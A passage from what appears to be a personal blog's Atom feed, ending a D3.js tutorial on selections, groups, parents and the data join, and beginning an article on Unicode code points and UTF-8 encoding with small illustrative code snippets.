/&gt;    &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;_groups &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; groups&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;_parents &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; parents&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;  &lt;span class=&quot;token comment&quot;&gt;// ... a bunch of methods&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But &lt;code&gt;select&lt;/code&gt; and &lt;code&gt;selectAll&lt;/code&gt; are also a little sneaky. They exist as top-level selection functions, &lt;code&gt;d3.select&lt;/code&gt; and &lt;code&gt;d3.selectAll&lt;/code&gt;, which query the entire document and return a selection with &lt;em&gt;one&lt;/em&gt; group containing either the first matching element or all of them.&lt;/p&gt;
&lt;p&gt;A selection also has its &lt;em&gt;own&lt;/em&gt; &lt;code&gt;select&lt;/code&gt; and &lt;code&gt;selectAll&lt;/code&gt; methods, however, which allow for nested selections. These return new selections limited to descendants of the original selection. With &lt;code&gt;selectAll&lt;/code&gt;, every element of the old selection becomes a group in the new selection, and each group holds that element&#39;s matching descendants. &lt;code&gt;select&lt;/code&gt; keeps the existing grouping and picks at most one matching descendant per element.&lt;/p&gt;
&lt;p&gt;Let&#39;s illustrate that with this &lt;code&gt;table&lt;/code&gt;:&lt;/p&gt;
&lt;table style=&quot;border: 1px solid var(--text)&quot;&gt;
  &lt;tr&gt;
    &lt;td&gt;One&lt;/td&gt;
    &lt;td&gt;Two&lt;/td&gt;
    &lt;td&gt;Three&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Four&lt;/td&gt;
    &lt;td&gt;Five&lt;/td&gt;
    &lt;td&gt;Six&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;tr-ee class=&quot;breakout&quot;&gt;
&lt;/tr-ee&gt;
&lt;p&gt;This becomes important when we start to think about the data join. Specifically, the enter selection.&lt;/p&gt;
&lt;p&gt;In D3&#39;s data join, the parent of a new element created by the &lt;code&gt;.join()&lt;/code&gt; method is determined by the selection it&#39;s called on. The &lt;code&gt;selection.select()&lt;/code&gt; method returns a new selection where the group&#39;s parent is inherited from the original selection.&lt;/p&gt;
&lt;p&gt;Often, this is the &lt;code&gt;&amp;lt;html&amp;gt;&lt;/code&gt; element because &lt;code&gt;d3.select&lt;/code&gt; will &lt;em&gt;always&lt;/em&gt; set the parent to the &lt;code&gt;&amp;lt;html&amp;gt;&lt;/code&gt; element.&lt;/p&gt;
&lt;p&gt;Let&#39;s break for a second here to check our understanding:&lt;/p&gt;
&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; data &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;x&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;100&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;y&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;100&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;r&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;25&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;d3&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;select&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;svg&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;select&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;circle&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token 
punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;join&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;circle&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;cx&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;x&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;cy&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;y&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token 
string&quot;&gt;&quot;r&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;  &lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;r&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;data-id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;the-missing-circle&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Given our new knowledge of how D3 sets a parent, and this code, where will the &lt;code&gt;&amp;lt;circle&amp;gt;&lt;/code&gt; end up?&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;🔎 This code has been run on this page. You can investigate the DOM in your browser&#39;s development tools and search for &lt;code&gt;the-missing-circle&lt;/code&gt; if you want to double-check your thinking, or if you don&#39;t believe me.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;script type=&quot;module&quot; async=&quot;&quot;&gt;
import * as d3 from &quot;https://cdn.jsdelivr.net/npm/d3@7/+esm&quot;;

const data = [{ x: 100, y: 100, r: 25 }];

d3.select(&quot;svg&quot;)
  .select(&quot;circle&quot;)
  .data(data)
  .join(&quot;circle&quot;)
  .attr(&quot;cx&quot;, d =&gt; d.x)
  .attr(&quot;cy&quot;, d =&gt; d.y)
  .attr(&quot;r&quot;,  d =&gt; d.r)
  .attr(&quot;data-id&quot;, &quot;the-missing-circle&quot;)
&lt;/script&gt;
&lt;p&gt;The answer is the &lt;code&gt;&amp;lt;html&amp;gt;&lt;/code&gt; element. We can break down why:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The initial &lt;code&gt;d3.select(&amp;quot;svg&amp;quot;)&lt;/code&gt; creates a selection with a single group, with its parent set to the &lt;code&gt;&amp;lt;html&amp;gt;&lt;/code&gt; element.&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;.select(&amp;quot;circle&amp;quot;)&lt;/code&gt; creates a new, empty selection that inherits the &lt;code&gt;&amp;lt;html&amp;gt;&lt;/code&gt; parent.&lt;/li&gt;
&lt;li&gt;We bind the data to the selection, creating an enter selection as there is no corresponding &lt;code&gt;&amp;lt;circle&amp;gt;&lt;/code&gt; element for the data.&lt;/li&gt;
&lt;li&gt;When the &lt;code&gt;join&lt;/code&gt; method invokes the &lt;code&gt;enter&lt;/code&gt; callback, D3 appends a &lt;code&gt;&amp;lt;circle&amp;gt;&lt;/code&gt; to the parent element: &lt;code&gt;&amp;lt;html&amp;gt;&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In contrast, &lt;code&gt;selection.selectAll()&lt;/code&gt; creates a new selection where each group&#39;s parent is the element from the original selection. When you perform a data join, D3 knows to append the new elements as children of these specific group parents (e.g., appending &lt;code&gt;&amp;lt;td&amp;gt;&lt;/code&gt; elements inside a &lt;code&gt;&amp;lt;tr&amp;gt;&lt;/code&gt;). While you &lt;em&gt;could&lt;/em&gt; contort the D3 API enough that a &lt;code&gt;select&lt;/code&gt; would have a parent where something would display inside the DOM, it would never end up being quite the right parent.&lt;/p&gt;
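&lt;p&gt;One way to picture the difference is a toy model of groups and parents. This is only a sketch under loud assumptions: the nodes are plain objects rather than DOM elements, and &lt;code&gt;node&lt;/code&gt;, &lt;code&gt;findAll&lt;/code&gt;, &lt;code&gt;topLevelSelect&lt;/code&gt;, &lt;code&gt;select&lt;/code&gt; and &lt;code&gt;selectAll&lt;/code&gt; are hypothetical stand-ins, not D3&#39;s real functions.&lt;/p&gt;

```javascript
// Toy stand-ins for DOM nodes: plain objects with a tag and children.
function node(tag, children) {
  return { tag: tag, children: children || [] };
}

// Depth-first search for every descendant with a matching tag.
function findAll(root, tag) {
  const found = [];
  for (const child of root.children) {
    if (child.tag === tag) found.push(child);
    for (const match of findAll(child, tag)) found.push(match);
  }
  return found;
}

// Simplified model of a selection: groups, plus one parent per group.
// Like d3.select, the top-level version parents its single group to the root.
function topLevelSelect(documentRoot, tag) {
  const first = findAll(documentRoot, tag)[0] || null;
  return { groups: [[first]], parents: [documentRoot] };
}

function select(selection, tag) {
  // One match (or null) per existing element; parents carried over unchanged.
  const groups = selection.groups.map(function (group) {
    return group.map(function (el) {
      return el ? findAll(el, tag)[0] || null : null;
    });
  });
  return { groups: groups, parents: selection.parents };
}

function selectAll(selection, tag) {
  // Every existing element becomes the parent of its own new group.
  const groups = [];
  const parents = [];
  for (const group of selection.groups) {
    for (const el of group) {
      if (!el) continue;
      groups.push(findAll(el, tag));
      parents.push(el);
    }
  }
  return { groups: groups, parents: parents };
}

const svg = node("svg");
const html = node("html", [node("body", [svg])]);

const viaSelect = select(topLevelSelect(html, "svg"), "circle");
const viaSelectAll = selectAll(topLevelSelect(html, "svg"), "circle");

console.log(viaSelect.parents[0].tag);    // html
console.log(viaSelectAll.parents[0].tag); // svg
```

&lt;p&gt;In this model an entering element is appended to its group&#39;s parent, so only the &lt;code&gt;selectAll&lt;/code&gt; route would put a new circle inside the SVG.&lt;/p&gt;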
&lt;h2 id=&quot;joining-the-d3-enlightened&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/understanding-d3-selections/#joining-the-d3-enlightened&quot;&gt;Joining the D3 Enlightened&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;We&#39;ve explored why D3 exists in the first place, and how the data join is central to its magic. By binding data across three states - enter, update and exit - we gain a powerful general API to work with data in the DOM.&lt;/p&gt;
&lt;p&gt;We&#39;ll create one final visualisation to cement everything together. In the grid below, we bind data for randomly selected squares on an infinitely repeating timer. We use the data join to bring it to life in the DOM. Squares from the enter selection appear from &lt;span style=&quot;color:var(--flax)&quot;&gt;yellow&lt;/span&gt;, the update selection pulses &lt;span style=&quot;color:var(--aquamarine)&quot;&gt;green&lt;/span&gt; and the exit selection shrinks to &lt;span style=&quot;color:var(--bright-pink-crayola)&quot;&gt;red&lt;/span&gt;.&lt;/p&gt;
&lt;general-update-grid class=&quot;breakout&quot;&gt;
&lt;/general-update-grid&gt;
&lt;p&gt;With the power of D3 comes quite a low-level focus. There are certainly easier ways to make attractive basic charts - one of the D3 team&#39;s other projects, &lt;a href=&quot;https://observablehq.com/plot/&quot;&gt;Plot&lt;/a&gt;, does just that.&lt;/p&gt;
&lt;p&gt;And yet, I&#39;d argue that understanding D3 at a slightly lower level is a great way to appreciate it more thoroughly. If you don&#39;t come from a statistical background, I find it helps you appreciate that side of things, too.&lt;/p&gt;
&lt;p&gt;Not to mention you&#39;ll be able to correct the LLM when it makes the occasional mistake with the chart you just asked it to make. Here&#39;s to investigating with data!&lt;/p&gt;
&lt;p&gt;Further Reading:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://d3js.org/what-is-d3&quot;&gt;What is D3?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://bost.ocks.org/mike/join/&quot;&gt;Thinking with Joins&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://bost.ocks.org/mike/selection/&quot;&gt;How Selections Work&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content>
  </entry>
  <entry>
    <title>The Magic of UTF-8: How Computers Understand Text</title>
    <link href="https://martingaston.dev/articles/the-magic-of-utf8/"/>
    <updated>2025-01-01T00:00:00Z</updated>
    <id>https://martingaston.dev/articles/the-magic-of-utf8/</id>
    <content xml:lang="en" type="html">&lt;script type=&quot;module&quot; async=&quot;&quot; src=&quot;https://martingaston.dev/articles/the-magic-of-utf8/components/textToUTF8.js&quot;&gt;&lt;/script&gt;
&lt;script type=&quot;module&quot; async=&quot;&quot; src=&quot;https://martingaston.dev/articles/the-magic-of-utf8/components/randomCodePoints.js&quot;&gt;&lt;/script&gt;
&lt;script type=&quot;module&quot; async=&quot;&quot; src=&quot;https://martingaston.dev/articles/the-magic-of-utf8/components/bitDistribution.js&quot;&gt;&lt;/script&gt;
&lt;script type=&quot;module&quot; async=&quot;&quot; src=&quot;https://martingaston.dev/articles/the-magic-of-utf8/components/bmp.js&quot;&gt;&lt;/script&gt;
&lt;p&gt;&lt;noscript&gt;This blog post has lots of interactive elements with JavaScript&lt;/noscript&gt;&lt;/p&gt;
&lt;p&gt;If computers are just ones and zeroes, how are you reading this? Computers don&#39;t understand letters. Everything you read on these life-cursing devices has been turned into numbers.&lt;/p&gt;
&lt;p&gt;Let&#39;s think about how this works. Imagine you want to write me a message, but we&#39;ve agreed to communicate only via (hexadecimal) numbers. We decide to map letters to numbers. After much deliberation, we agree &lt;code&gt;41&lt;/code&gt;&lt;sup class=&quot;footnote-ref&quot;&gt;&lt;a href=&quot;https://martingaston.dev/articles/the-magic-of-utf8/#fn1&quot; id=&quot;fnref1&quot;&gt;[1]&lt;/a&gt;&lt;/sup&gt; will represent &lt;code&gt;A&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;In the real world, we can spit this into a &lt;code&gt;.txt&lt;/code&gt; file and observe the results:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token builtin class-name&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&#39;&#92;x41&#39;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt; lovely-message.txt&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;cat&lt;/span&gt; lovely-message.txt&lt;br /&gt;A%&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It works! That&#39;s because most computers already interpret &lt;code&gt;0x41&lt;/code&gt; as &lt;code&gt;A&lt;/code&gt; due to &lt;a href=&quot;https://www.unicode.org/&quot;&gt;Unicode&lt;/a&gt;, the world&#39;s de facto text encoding standard in 2025.&lt;/p&gt;
&lt;p&gt;Numbers go in, letters come out. We can also work in the other direction:&lt;/p&gt;
&lt;p&gt;&lt;text-to-utf8&gt;&lt;/text-to-utf8&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The box above is interactive, so play around with various characters and see if you can find some interesting results. Some ideas:
 &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;English text (&lt;code&gt;Hello, World!&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Uppercase and lowercase characters (look at how &lt;code&gt;HeLlO wOrLd&lt;/code&gt; is different to &lt;code&gt;hElLo WoRlD&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Non-English text, e.g. Japanese (&lt;code&gt;こんにちは世界&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Emoji (👋🌍)&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;Unicode is a successful standard because it solves the problem of everyone having to agree on &lt;em&gt;what&lt;/em&gt; characters should become &lt;em&gt;what&lt;/em&gt; numbers. Yes, this used to be a big problem. But it also triggers its own follow-up questions, such as: why does &lt;code&gt;A&lt;/code&gt; get converted into a single number (&lt;code&gt;0x41&lt;/code&gt;) but &lt;code&gt;À&lt;/code&gt; ends up as two (&lt;code&gt;0xC3 0x80&lt;/code&gt;)? And how come we can squidge all of &lt;code&gt;Hello, World!&lt;/code&gt; into 13 bytes, but a single &lt;code&gt;👩🏽‍🏫&lt;/code&gt; emoji takes up 15 bytes&lt;sup class=&quot;footnote-ref&quot;&gt;&lt;a href=&quot;https://martingaston.dev/articles/the-magic-of-utf8/#fn2&quot; id=&quot;fnref2&quot;&gt;[2]&lt;/a&gt;&lt;/sup&gt; just by itself?&lt;/p&gt;
&lt;p&gt;We&#39;ll get to it.&lt;/p&gt;
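&lt;p&gt;In the meantime, the byte values are easy to check for yourself. This is a small sketch using the standard &lt;code&gt;TextEncoder&lt;/code&gt;, which always encodes to UTF-8; the &lt;code&gt;utf8Hex&lt;/code&gt; helper is a made-up name for the example.&lt;/p&gt;

```javascript
// TextEncoder always produces UTF-8, so the array length is the byte count.
const encoder = new TextEncoder();

// Hypothetical helper: the UTF-8 bytes of a string as hex strings.
function utf8Hex(text) {
  return Array.from(encoder.encode(text), function (byte) {
    return "0x" + byte.toString(16).toUpperCase().padStart(2, "0");
  });
}

// Woman, medium skin tone, zero width joiner, school: written as escapes
// so the four code points behind the teacher emoji are visible.
const teacher = "\u{1F469}\u{1F3FD}\u{200D}\u{1F3EB}";

console.log(utf8Hex("A"));            // [ '0x41' ]
console.log(utf8Hex("\u00C0"));       // [ '0xC3', '0x80' ]
console.log(utf8Hex(teacher).length); // 15
```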
&lt;h2 id=&quot;one-giant-dictionary&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/the-magic-of-utf8/#one-giant-dictionary&quot;&gt;One Giant Dictionary&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Let&#39;s start with what Unicode calls a code point, which at its most straightforward represents a single character in the overall Unicode space. Code points are the core building blocks of Unicode, and conceptually represent the letters, numbers and punctuation of most of the world&#39;s languages.&lt;/p&gt;
&lt;p&gt;Unicode has been designed to be big. To feel the breadth of all this, play with this randomised display of code points from just 0.08% of the overall Unicode space:&lt;/p&gt;
&lt;p&gt;&lt;random-code-points&gt;&lt;/random-code-points&gt;&lt;/p&gt;
&lt;p&gt;You&#39;ll notice the characters above have all been rendered as glyphs: as in, you&#39;re &lt;em&gt;looking&lt;/em&gt; at them. Unicode does not actually concern itself with how things are displayed. Some code points aren&#39;t even &lt;em&gt;designed&lt;/em&gt; to be &#39;seen&#39; in the way that a typical user would expect. Other things you might see on your screen come from smooshing &lt;em&gt;two&lt;/em&gt; (or more) code points together: the Union Jack flag is actually &lt;em&gt;both&lt;/em&gt; &lt;code&gt;U+1F1EC&lt;/code&gt; and &lt;code&gt;U+1F1E7&lt;/code&gt;, which will display as 🇬 and 🇧 when separate but 🇬🇧 when adjacent.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The Unicode spec handily defines what you or I &lt;em&gt;expect&lt;/em&gt; to be a single character as a &lt;em&gt;user-perceived character&lt;/em&gt;, because the term &#39;character&#39; is massively overloaded. The formal way of defining a user-perceived character in Unicode is a &lt;em&gt;grapheme cluster&lt;/em&gt;, which is a term we&#39;ll start using. By this point you&#39;re pretty deep into the annexes of the specification: you&#39;re looking for &lt;a href=&quot;https://www.unicode.org/reports/tr29/tr29-45.html&quot;&gt;UAX #29&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;1,114,112 possible code points are available&lt;sup class=&quot;footnote-ref&quot;&gt;&lt;a href=&quot;https://martingaston.dev/articles/the-magic-of-utf8/#fn3&quot; id=&quot;fnref3&quot;&gt;[3]&lt;/a&gt;&lt;/sup&gt;, of which 154,998 have been used as of &lt;a href=&quot;https://www.unicode.org/versions/Unicode16.0.0/&quot;&gt;Unicode version 16.0&lt;/a&gt;. Unicode partitions its space into seventeen planes numbered 0 through 16, with each plane supporting 65,536 code points. Plane 0 is known as the Basic Multilingual Plane (BMP), and contains the majority of our languages. Planes 1 through 16 are defined as the Supplementary Planes. 10 of the supplementary planes are currently completely unused.&lt;/p&gt;
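&lt;p&gt;The arithmetic behind those numbers is easy to check. This is a small Python sketch; &lt;code&gt;plane_of&lt;/code&gt; is a hypothetical helper named for this example, not anything from the Unicode spec.&lt;/p&gt;

```python
PLANES = 17
CODE_POINTS_PER_PLANE = 0x10000  # 65,536

total = PLANES * CODE_POINTS_PER_PLANE
highest = total - 1  # code points are numbered from zero


def plane_of(code_point: int) -> int:
    """Return the plane number (0 to 16) that a code point falls in."""
    return code_point // CODE_POINTS_PER_PLANE


print(f"{total:,}")       # 1,114,112
print(f"U+{highest:X}")   # U+10FFFF
print(plane_of(0x41))     # 0, the Basic Multilingual Plane
print(plane_of(0x1F602))  # 1, a supplementary plane
```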
&lt;p&gt;If you&#39;re reading this, it&#39;s likely most characters you&#39;ll encounter on a day-to-day basis feature in the Basic Multilingual Plane. The basic Latin character set used for the English language is nestled right near the start of the BMP. In fact, the mapping of &lt;code&gt;0x41&lt;/code&gt; to &lt;code&gt;A&lt;/code&gt; originally came from the formerly dominant ASCII standard, which was mostly fine if you were looking to encode English and a pain if you weren&#39;t. In order to smooth overall adoption when it came to rolling out Unicode, ASCII&#39;s encodings became a subset of Unicode: &lt;code&gt;0x41&lt;/code&gt; in ASCII is &lt;code&gt;U+0041&lt;/code&gt; in Unicode. This was a smart design decision.&lt;/p&gt;
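&lt;p&gt;You can see the subset relationship for yourself. This Python sketch decodes each of the 128 ASCII values and checks that the resulting character has the same number as its Unicode code point. The variable names are illustrative only.&lt;/p&gt;

```python
# Decode every ASCII value and compare it with its Unicode code point.
ascii_matches = all(
    ord(bytes([value]).decode("ascii")) == value
    for value in range(128)
)

print(ascii_matches)   # True
print(hex(ord("A")))   # 0x41
```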
&lt;p&gt;The problem with ASCII, it turned out, was there was &lt;em&gt;so much language&lt;/em&gt; outside of the limits of what it could recognise: its 7-bit space maxed out at a meagre 128 characters. Comprehending the sheer amount of work and effort to accommodate all of the planet&#39;s languages can actually be particularly tricky for native English speakers (typers?) to wrap their heads around, mostly because we&#39;ve never had to actively think about it for the majority of our computing lives: ASCII was literally built just for us.&lt;/p&gt;
&lt;p&gt;If you visualise &lt;em&gt;just the basic multilingual plane&lt;/em&gt; you can isolate the non-control characters of the ASCII block to see just how small it is in the overall space:&lt;/p&gt;
&lt;p&gt;&lt;bmp-tree&gt;&lt;/bmp-tree&gt;&lt;/p&gt;
&lt;p&gt;So, to be specific, one or more Unicode code points define the grapheme cluster &lt;em&gt;representation&lt;/em&gt; of what the user perceives as a character, and its glyph is how it &lt;em&gt;looks&lt;/em&gt; on their screen. A grapheme cluster could be &lt;code&gt;A&lt;/code&gt; or &lt;code&gt;é&lt;/code&gt; or even &lt;code&gt;👩‍🚀&lt;/code&gt;. It might seem somewhat obvious but it&#39;s worth hammering that home: the glyphs for &lt;span style=&quot;font-family: &amp;quot;Comic Sans MS&amp;quot;, sans-serif; color: var(--aquamarine)&quot;&gt;hello&lt;/span&gt; can look different when rendered with &lt;span style=&quot;font-family: &amp;quot;Comic Sans MS&amp;quot;, sans-serif; color: var(--aquamarine)&quot;&gt;a sans-serif font&lt;/span&gt; than when &lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;, serif; color: var(--amaranth-pink)&quot;&gt;hello&lt;/span&gt; is rendered with a &lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;, serif; color: var(--amaranth-pink)&quot;&gt;serif&lt;/span&gt; one.&lt;/p&gt;
&lt;h2 id=&quot;onward%2C-to-bytes!&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/the-magic-of-utf8/#onward%2C-to-bytes!&quot;&gt;Onward, to Bytes!&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;The next step is to take those code points and encode them into sequences of bytes, so we can do things like save them as documents or send them down internet pipes. Unicode code points can be encoded in three delicious flavours: UTF-32, UTF-16 and UTF-8. Which one should you use?&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Spoiler: it&#39;s UTF-8.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;UTF-8, UTF-16 and UTF-32 are named based on the &lt;em&gt;minimum&lt;/em&gt; number of bits needed to encode a code point: 8, 16 or 32, respectively. This means UTF-32 is theoretically the simplest, as every single code point uses exactly four bytes, but also the most space inefficient. Also, do not be lulled into a false sense of security that UTF-32 is guaranteed to be straightforward, as we&#39;ve already seen that code points do not have a 1:1 mapping with what&#39;s displayed on the screen due to grapheme clusters - remember &lt;code&gt;🇬🇧&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;Due to its ASCII heritage&lt;sup class=&quot;footnote-ref&quot;&gt;&lt;a href=&quot;https://martingaston.dev/articles/the-magic-of-utf8/#fn4&quot; id=&quot;fnref4&quot;&gt;[4]&lt;/a&gt;&lt;/sup&gt; and position at the very beginning of the code space, Basic Latin characters don&#39;t need more than one byte to be encoded in UTF-8. Both UTF-16 and UTF-8 are variable in their length, with UTF-16 being two bytes for anything in the Basic Multilingual Plane and four bytes for everything else. UTF-16 can be the most space efficient for some Asian languages. UTF-8 goes even further, and encodes each code point in between one and four bytes.&lt;/p&gt;
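&lt;p&gt;To make the size trade-off concrete, here&#39;s a rough Python sketch that encodes four sample code points in each flavour and counts the bytes. The samples are my own picks for illustration. The &lt;code&gt;-be&lt;/code&gt; codec names are used so Python doesn&#39;t prepend a byte order mark and skew the counts.&lt;/p&gt;

```python
# Sample code points chosen for illustration: one from each UTF-8 width.
samples = {
    "U+0041": "\u0041",       # Latin capital A
    "U+00C0": "\u00C0",       # Latin capital A with grave
    "U+4E2D": "\u4E2D",       # a CJK ideograph in the BMP
    "U+1F602": "\U0001F602",  # an emoji outside the BMP
}

sizes = {}
for label, character in samples.items():
    sizes[label] = (
        len(character.encode("utf-8")),
        len(character.encode("utf-16-be")),
        len(character.encode("utf-32-be")),
    )

for label, (utf8, utf16, utf32) in sizes.items():
    print(f"{label:8} utf-8={utf8} utf-16={utf16} utf-32={utf32}")
```

&lt;p&gt;The CJK sample takes three bytes in UTF-8 but only two in UTF-16, which is where the space efficiency argument for UTF-16 comes from.&lt;/p&gt;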
&lt;p&gt;Anyway, fast forward a couple of decades and &lt;a href=&quot;https://utf8everywhere.org/&quot;&gt;UTF-8 emerged as the clear favourite&lt;/a&gt;. 98% of websites now use UTF-8. Due to the success of UTF-8 and its ubiquity, most of us can go about our days without having to contemplate it in the slightest. I&#39;m going to totally gloss over UTF-16 and UTF-32 for the rest of this article, which at least saves a discussion about endianness, and I can do this so flippantly exactly because UTF-8 is so popular.&lt;/p&gt;
&lt;blockquote&gt;
